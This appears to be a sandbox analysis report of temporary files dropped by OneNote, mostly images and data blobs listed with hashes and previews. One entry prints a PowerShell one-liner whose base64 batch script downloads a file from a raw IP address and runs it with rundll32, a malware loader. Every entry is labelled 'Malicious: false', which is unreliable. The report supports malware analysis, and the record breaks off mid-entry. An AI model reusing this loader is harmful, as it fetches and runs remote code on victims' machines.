Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Temp\{3E124E3B-E7B5-401A-8988-3ACAE8280837}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{3F4AD35D-49A1-4812-936C-EE2A7CC0FFB7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6454794777013431
Encrypted:	false
SSDEEP:	6:Ra0iU+jYyfB3h1RRXUnfkXlPmFFBl/FKORyISRJRujlw//0lweI/3SR7Rujd:Ra0iJjYyf9/UfRFFBtDIISAWf/3S4
MD5:	E1C35476D9CADABA87E345363E14D9E7
SHA1:	0199067515304B7070015CFDE47F5A7AF75430CF
SHA-256:	471C4017CC964B019E4F124619648C12CCDE03CC291D915D90A7A7DD5140C91A
SHA-512:	1A38D10ED859AC44B5AFC5D9EB371779B321315A61AF75232E393919F92736306617CC3119746714A171BCF7A272B1ECB80B0B1C3FD81E265AD39F15C91C8B86
Malicious:	false
Preview:	./.C..vL....W"v_].....K...j...X................?.....I...............................................................................................................h.............................................o@58.N......._........x..=..I....................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{433BCC0C-0E64-47B8-8678-615C2FE0C06E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6477970657476181
Encrypted:	false
SSDEEP:	6:RaXw+ttYyfB3h1RRXUnfvFNFFBl/FKkCagUkrRujlw//0lweI/y1XkxRujd:RaTttYyf9/UfvFNFFBtNF5Wf/yZx
MD5:	89B0632800598D9782BF02C28B7ADC39
SHA1:	2801A2E216270042711E4C6C1943792C8615974D
SHA-256:	C3E1261D9522CF6BF6BE49479BA7F1FA5729CC5345BD419E185C32E31F8F0DFA
SHA-512:	5796F9896151DC3B4A543E52F387738B9F8303DC3DE2DA7C14F69CE3E820DB118CDF52767B7ABDA9D44E232A5004F979D4C23E0AC687325B0D8BEDA1BB1FA98E
Malicious:	false
Preview:	./.C..vL....W"v_y.X.p..C..:a...h................?.....I...............................................................................................................h.............................................O...@.*.ND.].........?...w\.B....8.1............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{4513737A-BEBA-4625-9715-D01556CD9D5B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.641052468815228
Encrypted:	false
SSDEEP:	6:RaCM40lVYyfB3h1RRXUnfZ0GsDot9FFBl/FKP1bQrG1frRujlw//0lweI/kS0G10:RaCiVYyf9/UfZEEt9FFBt5TWf/V03
MD5:	529B25D17E46041344778C1C913EA23A
SHA1:	E71FCEA5A5D0791E5E66819B8C70D010DFECFFB6
SHA-256:	6960F557B4C438213FFE31B903CB83F79B7222C0AE21153B32D10C02867954B6
SHA-512:	8879EE46AA5FC2C780B5B73066E8CF0F04D41E206F5BA2E724D821392AF1A2761C85AA823F53D6CFE044B773136F1CE124AC0F41778A24E8D2BBEA67FFDB9F90
Malicious:	false
Preview:	./.C..vL....W"v_.x.vk.:G.......................?.....I...............................................................................................................h...........................................T...suN...)N"..........3.s'..TH.\..ox&.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{469EBF0F-7D0C-4CCB-B96B-0220A6325094}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{47738259-D11F-4703-9C7E-177AD0F39A5F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{477ED6FB-EFCE-4D92-A5A9-7A479675E1B1}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Temp\{495261FE-6E93-4A58-9DF5-EF6A58BC8655}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Temp\{4A761C53-3673-43FD-AC5B-CF6EA0355BC0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Temp\{4D7F063C-55D1-4A4A-B756-C1934C3AA9B4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Temp\{4EBD424B-D83D-46F7-96CD-C0AD7F7F6923}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Temp\{5093CB55-E877-472A-88CC-DBABD31BCB4E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Temp\{51915150-9592-49EF-94E7-62325AF7104D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (585), with no line terminators
Category:	dropped
Size (bytes):	585
Entropy (8bit):	5.967951232824609
Encrypted:	false
SSDEEP:	12:snL9hLLgyaI4HPKC2EwO45xeM8spEO7b2WO1xyRciV0hMmzVt3FE+pwtB:iphLLCHPKC2Ey1EWbTNV0hJVBa+SB
MD5:	98BF90784670146355CD8C0B448374D9
SHA1:	69BDCEDA1CCD23D7A6AC121A6D06DBD10BDF028F
SHA-256:	EBFA09E9DAAE96EFB34FBF8DC6E4F4564EF72BED884FE4DA3C860687A5668227
SHA-512:	DBEE85B82F972CCED280437B89D030F7DA05F04D86E2EAA9460307DB0B26942BBA66960CE0E72389BD4399BBEC08B6AA01727F7A4DB81F1EE15338BDBA0751F3
Malicious:	false
Preview:	powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) > C:\Users\Public\1.cmd&&start /min C:\Users\Public\1.cmd nd

C:\Users\user\AppData\Local\Temp\{54BB7EBF-6ED9-4A6C-B038-1E96B5413044}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{552D13F0-F233-4BE1-AC38-1DC723CA9058}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Temp\{559F15B6-883A-469E-8802-82EDE448DA8B}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Temp\{57E38B0C-81D3-4C53-AF45-5D49B077A820}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6503460935397876
Encrypted:	false
SSDEEP:	6:RagQ78tFYyfB3h1RRXUnfIg8LrceNFFBl/FKE0+JM6JMbRujlw//0lweI/ipJMBm:Rag+8bYyf9/UfnIrLFFBttK7EWf/iUs
MD5:	90801F1515E9671DABC432236237EBE0
SHA1:	A143FAA567459A97782B6709D7EA4E65CA662855
